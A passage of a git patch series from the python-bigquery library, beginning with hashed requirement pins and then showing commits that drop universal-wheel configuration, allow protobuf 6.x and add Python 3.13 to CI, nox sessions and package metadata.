--hash=sha256:242d6860f1fd9191aef5fae22b51c5c19767f93fb9ead4d21924e0bcb17619d8 \ - --hash=sha256:244dbe463d5fb6d7ce161301a03a6fe744dac9072328ba9fc82289238582697b \ - --hash=sha256:26627785a54a947f6d7336ce5963569b5d75614619e75193bdb4e06e21d447ad \ - --hash=sha256:2a4b34a8d14649315c4bc26bbfa352663eb51d146e35eef231dd739d54a5430a \ - --hash=sha256:2ae99f31f47d849758a687102afdd05bd3d3ff7dbab0a8f1587981b58a76152a \ - --hash=sha256:312387403cd40699ab91d50735ea7a507b788091c416dd007eac54434aee51da \ - --hash=sha256:3341c043c37d78cc5ae6e3e305e988532b072329639007fd408a476642a89fd6 \ - --hash=sha256:33d1c36b90e570ba7785dacd1faaf091203d9942bc036118fab8110a401eb1a8 \ - --hash=sha256:3e683ee4f5d0fa2dde4db77ed8dd8a876686e3fc417655c2ece9a90576905344 \ - --hash=sha256:3ffb4a8e7d46ed96ae48805746755fadd0909fea2306f93d5d8233ba23dda12a \ - --hash=sha256:40621d60d0e58aa573b68ac5e2d6b20d44392878e0bfc159012a5787c4e35bc8 \ - --hash=sha256:40f1e10d51c92859765522cbd79c5c8989f40f0419614bcdc5015e7b6bf97fc5 \ - --hash=sha256:45d42d132cff577c92bfba536aefcfea7e26efb975bd455db4e6602f5c9f45e7 \ - --hash=sha256:48488d999ed50ba8d38c581d67e496f955821dc183883550a6fbc7f1aefdc170 \ - --hash=sha256:4935dd7883f1d50e2ffecca0aa33dc1946a94c8f3fdafb8df5c330e48f71b132 \ - --hash=sha256:4c2d64fdba74ad16138300815cfdc6ab2f4647e23ced81f59e940d7d4a1469d9 \ - --hash=sha256:4c8817557d0de9349109acb38b9dd570b03cc5014e8aabf1cbddc6e81005becd \ - --hash=sha256:4ffaaac913c3f7345579db4f33b0020db693f302ca5137f106060316761beea9 \ - --hash=sha256:5a4cb365cb49b750bdb60b846b0c0bc49ed62e59a76635095a179d440540c346 \ - --hash=sha256:62fada2c942702ef8952754abfc1a9f7658a4d5460fabe95ac7ec2cbe0d02abc \ - --hash=sha256:67c519635a4f64e495c50e3107d9b4075aec33634272b5db1cde839e07367589 \ - --hash=sha256:6a54c43d3ec4cf2a39f4387ad044221c66a376e58c0d0e971d47c475ba79c6b5 \ - --hash=sha256:7044312a928a66a4c2a22644147bc61a199c1709712069a344a3fb5cfcf16915 \ - --hash=sha256:730d86af59e0e43ce277bb83970530dd223bf7f2a838e086b50affa6ec5f9295 \ - --hash=sha256:800100d45176652ded796134277ecb13640c1a537cad3b8b53da45aa96330453 \ - --hash=sha256:80fcbf3add8790caddfab6764bde258b5d09aefbe9169c183f88a7410f0f6dea \ - --hash=sha256:82b5dba6eb1bcc29cc305a18a3c5365d2af06ee71b123216416f7e20d2a84e5b \ - --hash=sha256:852dc840f6d7c985603e60b5deaae1d89c56cb038b577f6b5b8c808c97580f1d \ - --hash=sha256:8ad4ad1429cd4f315f32ef263c1342166695fad76c100c5d979c45d5570ed58b \ - --hash=sha256:8ae369e84466aa70f3154ee23c1451fda10a8ee1b63923ce76667e3077f2b0c4 \ - --hash=sha256:93e8248d650e7e9d49e8251f883eed60ecbc0e8ffd6349e18550925e31bd029b \ - --hash=sha256:973a371a55ce9ed333a3a0f8e0bcfae9e0d637711534bcb11e130af2ab9334e7 \ - --hash=sha256:9ba25a71ebf05b9bb0e2ae99f8bc08a07ee8e98c612175087112656ca0f5c8bf \ - --hash=sha256:a10860e00ded1dd0a65b83e717af28845bb7bd16d8ace40fe5531491de76b79f \ - --hash=sha256:a4792d3b3a6dfafefdf8e937f14906a51bd27025a36f4b188728a73382231d91 \ - --hash=sha256:a7420ceda262dbb4b8d839a4ec63d61c261e4e77677ed7c66c99f4e7cb5030dd \ - --hash=sha256:ad91738f14eb8da0ff82f2acd0098b6257621410dcbd4df20aaa5b4233d75a50 \ - --hash=sha256:b6a387d61fe41cdf7ea95b38e9af11cfb1a63499af2759444b99185c4ab33f5b \ - --hash=sha256:b954093679d5750495725ea6f88409946d69cfb25ea7b4c846eef5044194f583 \ - --hash=sha256:bbde71a705f8e9e4c3e9e33db69341d040c827c7afa6789b14c6e16776074f5a \ - --hash=sha256:beeebf760a9c1f4c07ef6a53465e8cfa776ea6a2021eda0d0417ec41043fe984 \ - --hash=sha256:c91b394f7601438ff79a4b93d16be92f216adb57d813a78be4446fe0f6bc2d8c \ - --hash=sha256:c97ff7fedf56d86bae92fa0a646ce1a0ec7509a7578e1ed238731ba13aabcd1c \ - --hash=sha256:cb53e2a99df28eee3b5f4fea166020d3ef9116fdc5764bc5117486e6d1211b25 \ - --hash=sha256:cbf445eb5628981a80f54087f9acdbf84f9b7d862756110d172993b9a5ae81aa \ - --hash=sha256:d06b24c686a34c86c8c1fba923181eae6b10565e4d80bdd7bc1c8e2f11247aa4 \ - --hash=sha256:d98e66a24497637dd31ccab090b34392dddb1f2f811c4b4cd80c230205c074a3 \ - --hash=sha256:db15ce28e1e127a0013dfb8ac243a8e392db8c61eae113337536edb28bdc1f97 \ - --hash=sha256:db842712984e91707437461930e6011e60b39136c7331e971952bb30465bc1a1 \ - --hash=sha256:e24bfe89c6ac4c31792793ad9f861b8f6dc4546ac6dc8f1c9083c7c4f2b335cd \ - --hash=sha256:e81c52638315ff4ac1b533d427f50bc0afc746deb949210bc85f05d4f15fd772 \ - --hash=sha256:e9393357f19954248b00bed7c56f29a25c930593a77630c719653d51e7669c2a \ - --hash=sha256:ee3941769bd2522fe39222206f6dd97ae83c442a94c90f2b7a25d847d40f4729 \ - --hash=sha256:f31ae06f1328595d762c9a2bf29dafd8621c7d3adc130cbb46278079758779ca \ - --hash=sha256:f94190df587738280d544971500b9cafc9b950d32efcb1fba9ac10d84e6aa4e6 \ - --hash=sha256:fa7d686ed9883f3d664d39d5a8e74d3c5f63e603c2e3ff0abcba23eac6542635 \ - --hash=sha256:fb532dd9900381d2e8f48172ddc5a59db4c445a11b9fab40b3b786da40d3b56b \ - --hash=sha256:fe32482b37b4b00c7a52a07211b479653b7fe4f22b2e481b9a9b099d8a430f2f - # via jinja2 -mdurl==0.1.2 \ - --hash=sha256:84008a41e51615a49fc9966191ff91509e3c40b939176e643fd50a5c2196b8f8 \ - --hash=sha256:bb413d29f5eea38f31dd4754dd7377d4465116fb207585f97bf925588687c1ba - # via markdown-it-py -more-itertools==10.5.0 \ - --hash=sha256:037b0d3203ce90cca8ab1defbbdac29d5f993fc20131f3664dc8d6acfa872aef \ - --hash=sha256:5482bfef7849c25dc3c6dd53a6173ae4795da2a41a80faea6700d9f5846c5da6 - # via - # jaraco-classes - # jaraco-functools -nh3==0.2.18 \ - --hash=sha256:0411beb0589eacb6734f28d5497ca2ed379eafab8ad8c84b31bb5c34072b7164 \ - --hash=sha256:14c5a72e9fe82aea5fe3072116ad4661af5cf8e8ff8fc5ad3450f123e4925e86 \ - --hash=sha256:19aaba96e0f795bd0a6c56291495ff59364f4300d4a39b29a0abc9cb3774a84b \ - --hash=sha256:34c03fa78e328c691f982b7c03d4423bdfd7da69cd707fe572f544cf74ac23ad \ - --hash=sha256:36c95d4b70530b320b365659bb5034341316e6a9b30f0b25fa9c9eff4c27a204 \ - --hash=sha256:3a157ab149e591bb638a55c8c6bcb8cdb559c8b12c13a8affaba6cedfe51713a \ - --hash=sha256:42c64511469005058cd17cc1537578eac40ae9f7200bedcfd1fc1a05f4f8c200 \ - --hash=sha256:5f36b271dae35c465ef5e9090e1fdaba4a60a56f0bb0ba03e0932a66f28b9189 \ - --hash=sha256:6955369e4d9f48f41e3f238a9e60f9410645db7e07435e62c6a9ea6135a4907f \ - --hash=sha256:7b7c2a3c9eb1a827d42539aa64091640bd275b81e097cd1d8d82ef91ffa2e811 \ - --hash=sha256:8ce0f819d2f1933953fca255db2471ad58184a60508f03e6285e5114b6254844 \ - --hash=sha256:94a166927e53972a9698af9542ace4e38b9de50c34352b962f4d9a7d4c927af4 \ - --hash=sha256:a7f1b5b2c15866f2db413a3649a8fe4fd7b428ae58be2c0f6bca5eefd53ca2be \ - --hash=sha256:c8b3a1cebcba9b3669ed1a84cc65bf005728d2f0bc1ed2a6594a992e817f3a50 \ - --hash=sha256:de3ceed6e661954871d6cd78b410213bdcb136f79aafe22aa7182e028b8c7307 \ - --hash=sha256:f0eca9ca8628dbb4e916ae2491d72957fdd35f7a5d326b7032a345f111ac07fe - # via readme-renderer -nox==2024.10.9 \ - --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ - --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 - # via -r requirements.in -packaging==24.1 \ - --hash=sha256:026ed72c8ed3fcce5bf8950572258698927fd1dbda10a5e981cdf0ac37f4f002 \ - --hash=sha256:5b8f2217dbdbd2f7f384c41c628544e6d52f2d0f53c6d0c3ea61aa5d1d7ff124 - # via - # gcp-releasetool - # nox -pkginfo==1.10.0 \ - --hash=sha256:5df73835398d10db79f8eecd5cd86b1f6d29317589ea70796994d49399af6297 \ - --hash=sha256:889a6da2ed7ffc58ab5b900d888ddce90bce912f2d2de1dc1c26f4cb9fe65097 - # via twine -platformdirs==4.3.6 \ - --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ - --hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb - # via virtualenv -proto-plus==1.24.0 \ - --hash=sha256:30b72a5ecafe4406b0d339db35b56c4059064e69227b8c3bda7462397f966445 \ - --hash=sha256:402576830425e5f6ce4c2a6702400ac79897dab0b4343821aa5188b0fab81a12 - # via google-api-core -protobuf==5.28.2 \ - --hash=sha256:2c69461a7fcc8e24be697624c09a839976d82ae75062b11a0972e41fd2cd9132 \ - --hash=sha256:35cfcb15f213449af7ff6198d6eb5f739c37d7e4f1c09b5d0641babf2cc0c68f \ - --hash=sha256:52235802093bd8a2811abbe8bf0ab9c5f54cca0a751fdd3f6ac2a21438bffece \ - --hash=sha256:59379674ff119717404f7454647913787034f03fe7049cbef1d74a97bb4593f0 \ - --hash=sha256:5e8a95246d581eef20471b5d5ba010d55f66740942b95ba9b872d918c459452f \ - --hash=sha256:87317e9bcda04a32f2ee82089a204d3a2f0d3c8aeed16568c7daf4756e4f1fe0 \ - --hash=sha256:8ddc60bf374785fb7cb12510b267f59067fa10087325b8e1855b898a0d81d276 \ - --hash=sha256:a8b9403fc70764b08d2f593ce44f1d2920c5077bf7d311fefec999f8c40f78b7 \ - --hash=sha256:c0ea0123dac3399a2eeb1a1443d82b7afc9ff40241433296769f7da42d142ec3 \ - --hash=sha256:ca53faf29896c526863366a52a8f4d88e69cd04ec9571ed6082fa117fac3ab36 \ - --hash=sha256:eeea10f3dc0ac7e6b4933d32db20662902b4ab81bf28df12218aa389e9c2102d - # via - # gcp-docuploader - # gcp-releasetool - # google-api-core - # googleapis-common-protos - # proto-plus -pyasn1==0.6.1 \ - --hash=sha256:0d632f46f2ba09143da3a8afe9e33fb6f92fa2320ab7e886e2d0f7672af84629 \ - --hash=sha256:6f580d2bdd84365380830acf45550f2511469f673cb4a5ae3857a3170128b034 - # via - # pyasn1-modules - # rsa -pyasn1-modules==0.4.1 \ - --hash=sha256:49bfa96b45a292b711e986f222502c1c9a5e1f4e568fc30e2574a6c7d07838fd \ - --hash=sha256:c28e2dbf9c06ad61c71a075c7e0f9fd0f1b0bb2d2ad4377f240d33ac2ab60a7c - # via google-auth -pycparser==2.22 \ - --hash=sha256:491c8be9c040f5390f5bf44a5b07752bd07f56edf992381b05c701439eec10f6 \ - --hash=sha256:c3702b6d3dd8c7abc1afa565d7e63d53a1d0bd86cdc24edd75470f4de499cfcc - # via cffi -pygments==2.18.0 \ - --hash=sha256:786ff802f32e91311bff3889f6e9a86e81505fe99f2735bb6d60ae0c5004f199 \ - --hash=sha256:b8e6aca0523f3ab76fee51799c488e38782ac06eafcf95e7ba832985c8e7b13a - # via - # readme-renderer - # rich -pyjwt==2.9.0 \ - --hash=sha256:3b02fb0f44517787776cf48f2ae25d8e14f300e6d7545a4315cee571a415e850 \ - --hash=sha256:7e1e5b56cc735432a7369cbfa0efe50fa113ebecdc04ae6922deba8b84582d0c - # via gcp-releasetool -pyperclip==1.9.0 \ - --hash=sha256:b7de0142ddc81bfc5c7507eea19da920b92252b548b96186caf94a5e2527d310 - # via gcp-releasetool -python-dateutil==2.9.0.post0 \ - --hash=sha256:37dd54208da7e1cd875388217d5e00ebd4179249f90fb72437e91a35459a0ad3 \ - --hash=sha256:a8b2bc7bffae282281c8140a97d3aa9c14da0b136dfe83f850eea9a5f7470427 - # via gcp-releasetool -readme-renderer==44.0 \ - --hash=sha256:2fbca89b81a08526aadf1357a8c2ae889ec05fb03f5da67f9769c9a592166151 \ - --hash=sha256:8712034eabbfa6805cacf1402b4eeb2a73028f72d1166d6f5cb7f9c047c5d1e1 - # via twine -requests==2.32.3 \ - --hash=sha256:55365417734eb18255590a9ff9eb97e9e1da868d4ccd6402399eaf68af20a760 \ - --hash=sha256:70761cfe03c773ceb22aa2f671b4757976145175cdfca038c02654d061d6dcc6 - # via - # gcp-releasetool - # google-api-core - # google-cloud-storage - # requests-toolbelt - # twine -requests-toolbelt==1.0.0 \ - --hash=sha256:7681a0a3d047012b5bdc0ee37d7f8f07ebe76ab08caeccfc3921ce23c88d5bc6 \ - --hash=sha256:cccfdd665f0a24fcf4726e690f65639d272bb0637b9b92dfd91a5568ccf6bd06 - # via twine -rfc3986==2.0.0 \ - --hash=sha256:50b1502b60e289cb37883f3dfd34532b8873c7de9f49bb546641ce9cbd256ebd \ - --hash=sha256:97aacf9dbd4bfd829baad6e6309fa6573aaf1be3f6fa735c8ab05e46cecb261c - # via twine -rich==13.9.2 \ - --hash=sha256:51a2c62057461aaf7152b4d611168f93a9fc73068f8ded2790f29fe2b5366d0c \ - --hash=sha256:8c82a3d3f8dcfe9e734771313e606b39d8247bb6b826e196f4914b333b743cf1 - # via twine -rsa==4.9 \ - --hash=sha256:90260d9058e514786967344d0ef75fa8727eed8a7d2e43ce9f4bcf1b536174f7 \ - --hash=sha256:e38464a49c6c85d7f1351b0126661487a7e0a14a50f1675ec50eb34d4f20ef21 - # via google-auth -secretstorage==3.3.3 \ - --hash=sha256:2403533ef369eca6d2ba81718576c5e0f564d5cca1b58f73a8b23e7d4eeebd77 \ - --hash=sha256:f356e6628222568e3af06f2eba8df495efa13b3b63081dafd4f7d9a7b7bc9f99 - # via keyring -six==1.16.0 \ - --hash=sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926 \ - --hash=sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254 - # via - # gcp-docuploader - # python-dateutil -tomli==2.0.2 \ - --hash=sha256:2ebe24485c53d303f690b0ec092806a085f07af5a5aa1464f3931eec36caaa38 \ - --hash=sha256:d46d457a85337051c36524bc5349dd91b1877838e2979ac5ced3e710ed8a60ed - # via nox -twine==5.1.1 \ - --hash=sha256:215dbe7b4b94c2c50a7315c0275d2258399280fbb7d04182c7e55e24b5f93997 \ - --hash=sha256:9aa0825139c02b3434d913545c7b847a21c835e11597f5255842d457da2322db - # via -r requirements.in -typing-extensions==4.12.2 \ - --hash=sha256:04e5ca0351e0f3f85c6853954072df659d0d13fac324d0072316b67d7794700d \ - --hash=sha256:1a7ead55c7e559dd4dee8856e3a88b41225abfe1ce8df57b7c13915fe121ffb8 - # via - # -r requirements.in - # rich -urllib3==2.2.3 \ - --hash=sha256:ca899ca043dcb1bafa3e262d73aa25c465bfb49e0bd9dd5d59f1d0acba2f8fac \ - --hash=sha256:e7d814a81dad81e6caf2ec9fdedb284ecc9c73076b62654547cc64ccdcae26e9 - # via - # requests - # twine -virtualenv==20.26.6 \ - --hash=sha256:280aede09a2a5c317e409a00102e7077c6432c5a38f0ef938e643805a7ad2c48 \ - --hash=sha256:7345cc5b25405607a624d8418154577459c3e0277f5466dd79c49d5e492995f2 - # via nox -wheel==0.44.0 \ - --hash=sha256:2376a90c98cc337d18623527a97c31797bd02bad0033d41547043a1cbfbe448f \ - --hash=sha256:a29c3f2817e95ab89aa4660681ad547c0e9547f20e75b0562fe7723c9a2a9d49 - # via -r requirements.in -zipp==3.20.2 \ - --hash=sha256:a817ac80d6cf4b23bf7f2828b7cabf326f15a001bea8b1f9b49631780ba28350 \ - --hash=sha256:bc9eb26f4506fda01b81bcde0ca78103b6e62f991b381fec825435c836edbc29 - # via importlib-metadata - -# The following packages are considered to be unsafe in a requirements file: -setuptools==75.1.0 \ - --hash=sha256:35ab7fd3bcd95e6b7fd704e4a1539513edad446c097797f2985e0e4b960772f2 \ - --hash=sha256:d59a21b17a275fb872a9c3dae73963160ae079f1049ed956880cd7c09b120538 - # via -r requirements.in From d7f76853d598c354bfd2e65f5dde28dae97da0ec Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Fri, 14 Mar 2025 09:36:26 -0400 Subject: [PATCH 074/202] fix: remove setup.cfg configuration for creating universal wheels (#2146) `setup.cfg` contains a setting to create a `Universal Wheel` which is only needed if libraries support both Python 2 and Python 3. This library only supports Python 3 so this setting is no longer needed. See https://packaging.python.org/en/latest/guides/distributing-packages-using-setuptools/#wheels. See similar PR https://togithub.com/googleapis/google-cloud-python/pull/13659 which includes this stack trace ``` running bdist_wheel /tmp/pip-build-env-9o_3w17v/overlay/lib/python3.13/site-packages/setuptools/_distutils/cmd.py:135: SetuptoolsDeprecationWarning: bdist_wheel.universal is deprecated !! ******************************************************************************** With Python 2.7 end-of-life, support for building universal wheels (i.e., wheels that support both Python 2 and Python 3) is being obviated. Please discontinue using this option, or if you still need it, file an issue with pypa/setuptools describing your use case. By 2025-Aug-30, you need to update your project and remove deprecated calls or your builds will no longer be supported. ******************************************************************************** !! ``` --- setup.cfg | 4 ---- 1 file changed, 4 deletions(-) diff --git a/setup.cfg b/setup.cfg index 37b63aa49..d5e734f0f 100644 --- a/setup.cfg +++ b/setup.cfg @@ -14,10 +14,6 @@ # See the License for the specific language governing permissions and # limitations under the License. -# Generated by synthtool. DO NOT EDIT! -[bdist_wheel] -universal = 1 - [pytype] python_version = 3.8 inputs = From 0842aa10967b1d8395cfb43e52c8ea091b381870 Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Tue, 18 Mar 2025 15:30:46 -0400 Subject: [PATCH 075/202] fix: Allow protobuf 6.x (#2142) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * fix: Allow protobuf 6.x * update prerelease_deps nox session so that prerelease versions of protobuf are installed * ensure python-bigquery is installed from source * feat: add support for Python 3.13 * restore replacement * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * fix typo --------- Co-authored-by: Owl Bot --- .github/sync-repo-settings.yaml | 5 +- ...deps-3.12.cfg => prerelease-deps-3.13.cfg} | 2 +- .../{snippets-3.12.cfg => snippets-3.13.cfg} | 2 +- .../{system-3.12.cfg => system-3.13.cfg} | 4 +- .kokoro/presubmit/system-3.9.cfg | 2 +- CONTRIBUTING.rst | 7 +- noxfile.py | 78 ++++++++++--------- owlbot.py | 35 ++------- pyproject.toml | 35 +++++---- testing/constraints-3.13.txt | 0 10 files changed, 76 insertions(+), 94 deletions(-) rename .kokoro/continuous/{prerelease-deps-3.12.cfg => prerelease-deps-3.13.cfg} (77%) rename .kokoro/presubmit/{snippets-3.12.cfg => snippets-3.13.cfg} (81%) rename .kokoro/presubmit/{system-3.12.cfg => system-3.13.cfg} (81%) create mode 100644 testing/constraints-3.13.txt diff --git a/.github/sync-repo-settings.yaml b/.github/sync-repo-settings.yaml index 188c44bbd..1e61b4d65 100644 --- a/.github/sync-repo-settings.yaml +++ b/.github/sync-repo-settings.yaml @@ -10,14 +10,15 @@ branchProtectionRules: requiresStrictStatusChecks: true requiredStatusCheckContexts: - 'Kokoro' - - 'Kokoro system-3.12' - - 'Kokoro snippets-3.12' + - 'Kokoro system-3.13' + - 'Kokoro snippets-3.13' - 'cla/google' - 'Samples - Lint' - 'Samples - Python 3.9' - 'Samples - Python 3.10' - 'Samples - Python 3.11' - 'Samples - Python 3.12' + - 'Samples - Python 3.13' - pattern: v2 requiresLinearHistory: true requiresCodeOwnerReviews: true diff --git a/.kokoro/continuous/prerelease-deps-3.12.cfg b/.kokoro/continuous/prerelease-deps-3.13.cfg similarity index 77% rename from .kokoro/continuous/prerelease-deps-3.12.cfg rename to .kokoro/continuous/prerelease-deps-3.13.cfg index ece962a17..99a1e7150 100644 --- a/.kokoro/continuous/prerelease-deps-3.12.cfg +++ b/.kokoro/continuous/prerelease-deps-3.13.cfg @@ -3,5 +3,5 @@ # Only run this nox session. env_vars: { key: "NOX_SESSION" - value: "prerelease_deps-3.12" + value: "prerelease_deps-3.13" } diff --git a/.kokoro/presubmit/snippets-3.12.cfg b/.kokoro/presubmit/snippets-3.13.cfg similarity index 81% rename from .kokoro/presubmit/snippets-3.12.cfg rename to .kokoro/presubmit/snippets-3.13.cfg index 1381e8323..0b89f0863 100644 --- a/.kokoro/presubmit/snippets-3.12.cfg +++ b/.kokoro/presubmit/snippets-3.13.cfg @@ -3,5 +3,5 @@ # Only run this nox session. env_vars: { key: "NOX_SESSION" - value: "snippets-3.12" + value: "snippets-3.13" } diff --git a/.kokoro/presubmit/system-3.12.cfg b/.kokoro/presubmit/system-3.13.cfg similarity index 81% rename from .kokoro/presubmit/system-3.12.cfg rename to .kokoro/presubmit/system-3.13.cfg index 789455bd6..a0e9a0108 100644 --- a/.kokoro/presubmit/system-3.12.cfg +++ b/.kokoro/presubmit/system-3.13.cfg @@ -3,5 +3,5 @@ # Only run this nox session. env_vars: { key: "NOX_SESSION" - value: "system-3.12" -} + value: "system-3.13" +} \ No newline at end of file diff --git a/.kokoro/presubmit/system-3.9.cfg b/.kokoro/presubmit/system-3.9.cfg index bd1fb514b..b8ae66b37 100644 --- a/.kokoro/presubmit/system-3.9.cfg +++ b/.kokoro/presubmit/system-3.9.cfg @@ -4,4 +4,4 @@ env_vars: { key: "NOX_SESSION" value: "system-3.9" -} +} \ No newline at end of file diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst index 8f4d54bce..b2993768b 100644 --- a/CONTRIBUTING.rst +++ b/CONTRIBUTING.rst @@ -143,12 +143,13 @@ Running System Tests $ nox -s system # Run a single system test - $ nox -s system-3.9 -- -k + $ nox -s system-3.13 -- -k .. note:: - System tests are configured to run under Python 3.9, 3.11, 3.12. + System tests are only configured to run under Python 3.9 and 3.13. + For expediency, we do not run them in older versions of Python 3. This alone will not run the tests. You'll need to change some local auth settings and change some configuration in your project to @@ -238,7 +239,7 @@ Supported versions can be found in our ``noxfile.py`` `config`_. .. _config: https://github.com/googleapis/python-bigquery/blob/main/noxfile.py -We also explicitly decided to support Python 3 beginning with version 3.7. +We also explicitly decided to support Python 3 beginning with version 3.9. Reasons for this include: - Encouraging use of newest versions of Python 3 diff --git a/noxfile.py b/noxfile.py index f069f8d37..1b118836b 100644 --- a/noxfile.py +++ b/noxfile.py @@ -38,8 +38,8 @@ ) DEFAULT_PYTHON_VERSION = "3.9" -SYSTEM_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12"] -UNIT_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12"] +SYSTEM_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12", "3.13"] +UNIT_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12", "3.13"] CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute() @@ -362,6 +362,40 @@ def prerelease_deps(session): https://github.com/googleapis/python-bigquery/issues/95 """ + # Because we test minimum dependency versions on the minimum Python + # version, the first version we test with in the unit tests sessions has a + # constraints file containing all dependencies and extras. + with open( + CURRENT_DIRECTORY + / "testing" + / f"constraints-{UNIT_TEST_PYTHON_VERSIONS[0]}.txt", + encoding="utf-8", + ) as constraints_file: + constraints_text = constraints_file.read() + + # Ignore leading whitespace and comment lines. + deps = [ + match.group(1) + for match in re.finditer( + r"^\s*(\S+)(?===\S+)", constraints_text, flags=re.MULTILINE + ) + ] + + session.install(*deps) + + session.install( + "--pre", + "--upgrade", + "freezegun", + "google-cloud-datacatalog", + "google-cloud-resource-manager", + "google-cloud-storage", + "google-cloud-testutils", + "psutil", + "pytest", + "pytest-cov", + ) + # PyArrow prerelease packages are published to an alternative PyPI host. # https://arrow.apache.org/docs/python/install.html#installing-nightly-packages session.install( @@ -386,48 +420,18 @@ def prerelease_deps(session): session.install( "--pre", "--upgrade", + "--no-deps", "google-api-core", "google-cloud-bigquery-storage", "google-cloud-core", "google-resumable-media", "db-dtypes", - # Exclude version 1.49.0rc1 which has a known issue. See https://github.com/grpc/grpc/pull/30642 - "grpcio!=1.49.0rc1", - ) - session.install( - "freezegun", - "google-cloud-datacatalog", - "google-cloud-resource-manager", - "google-cloud-storage", - "google-cloud-testutils", - "psutil", - "pytest", - "pytest-cov", + "grpcio", + "protobuf", ) - # Because we test minimum dependency versions on the minimum Python - # version, the first version we test with in the unit tests sessions has a - # constraints file containing all dependencies and extras. - with open( - CURRENT_DIRECTORY - / "testing" - / f"constraints-{UNIT_TEST_PYTHON_VERSIONS[0]}.txt", - encoding="utf-8", - ) as constraints_file: - constraints_text = constraints_file.read() - - # Ignore leading whitespace and comment lines. - deps = [ - match.group(1) - for match in re.finditer( - r"^\s*(\S+)(?===\S+)", constraints_text, flags=re.MULTILINE - ) - ] - - # We use --no-deps to ensure that pre-release versions aren't overwritten - # by the version ranges in setup.py. - session.install(*deps) - session.install("--no-deps", "-e", ".[all]") + # Ensure that this library is installed from source + session.install("-e", ".", "--no-deps") # Print out prerelease package versions. session.run("python", "-m", "pip", "freeze") diff --git a/owlbot.py b/owlbot.py index c8efaa98d..fceeaa1b6 100644 --- a/owlbot.py +++ b/owlbot.py @@ -55,6 +55,9 @@ "geopandas": "https://geopandas.org/", "pandas": "https://pandas.pydata.org/pandas-docs/stable/", }, + system_test_python_versions=["3.9", "3.13"], + unit_test_python_versions=["3.9", "3.10", "3.11", "3.12", "3.13"], + default_python_version="3.9", ) # BigQuery has a custom multiprocessing note @@ -86,41 +89,13 @@ python3.9 -m pip install --upgrade --quiet nox virtualenv==20.26.6""", "python3.9 -m pip install --upgrade --quiet nox virtualenv", ) -s.replace( - "CONTRIBUTING.rst", - "3.7, 3.8, 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows.", - "3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows.", -) -s.replace( - "CONTRIBUTING.rst", - r" \$ nox -s system-3.8 -- -k ", - r" $ nox -s system-3.9 -- -k ", -) -s.replace( - "CONTRIBUTING.rst", - r"""System tests are only configured to run under Python 3.8. - For expediency, we do not run them in older versions of Python 3.""", - r"System tests are configured to run under Python 3.9, 3.11, 3.12.", -) + s.replace( "CONTRIBUTING.rst", r"\$ nox -s py-3.8", r"$ nox -s py-3.9", ) -s.replace( - "CONTRIBUTING.rst", - r"""- `Python 3.7`_ -- `Python 3.8`_ -""", - r"", -) -s.replace( - "CONTRIBUTING.rst", - r""".. _Python 3.7: https://docs.python.org/3.7/ -.. _Python 3.8: https://docs.python.org/3.8/ -""", - r"", -) + s.replace( "scripts/readme-gen/templates/install_deps.tmpl.rst", r"Samples are compatible with Python 3.7", diff --git a/pyproject.toml b/pyproject.toml index 8822fc57d..17bf4fd20 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -37,17 +37,18 @@ classifiers = [ "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", + "Programming Language :: Python :: 3.13", "Operating System :: OS Independent", "Topic :: Internet", ] dependencies = [ - "google-api-core[grpc] >= 2.11.1, < 3.0.0dev", - "google-auth >= 2.14.1, < 3.0.0dev", - "google-cloud-core >= 2.4.1, < 3.0.0dev", - "google-resumable-media >= 2.0.0, < 3.0dev", + "google-api-core[grpc] >= 2.11.1, < 3.0.0", + "google-auth >= 2.14.1, < 3.0.0", + "google-cloud-core >= 2.4.1, < 3.0.0", + "google-resumable-media >= 2.0.0, < 3.0.0", "packaging >= 24.2.0", - "python-dateutil >= 2.8.2, < 3.0dev", - "requests >= 2.21.0, < 3.0.0dev", + "python-dateutil >= 2.8.2, < 3.0.0", + "requests >= 2.21.0, < 3.0.0", ] dynamic = ["version"] @@ -59,37 +60,37 @@ Repository = "https://github.com/googleapis/python-bigquery" # moved back to optional due to bloat. See # https://github.com/googleapis/python-bigquery/issues/1196 for more background. bqstorage = [ - "google-cloud-bigquery-storage >= 2.18.0, < 3.0.0dev", + "google-cloud-bigquery-storage >= 2.18.0, < 3.0.0", # Due to an issue in pip's dependency resolver, the `grpc` extra is not # installed, even though `google-cloud-bigquery-storage` specifies it # as `google-api-core[grpc]`. We thus need to explicitly specify it here. # See: https://github.com/googleapis/python-bigquery/issues/83 The # grpc.Channel.close() method isn't added until 1.32.0. # https://github.com/grpc/grpc/pull/15254 - "grpcio >= 1.47.0, < 2.0dev", - "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", + "grpcio >= 1.47.0, < 2.0.0", + "grpcio >= 1.49.1, < 2.0.0; python_version >= '3.11'", "pyarrow >= 4.0.0", ] pandas = [ "pandas >= 1.1.4", - "pandas-gbq >= 0.26.1; python_version >= '3.8'", - "grpcio >= 1.47.0, < 2.0dev", - "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", + "pandas-gbq >= 0.26.1", + "grpcio >= 1.47.0, < 2.0.0", + "grpcio >= 1.49.1, < 2.0.0; python_version >= '3.11'", 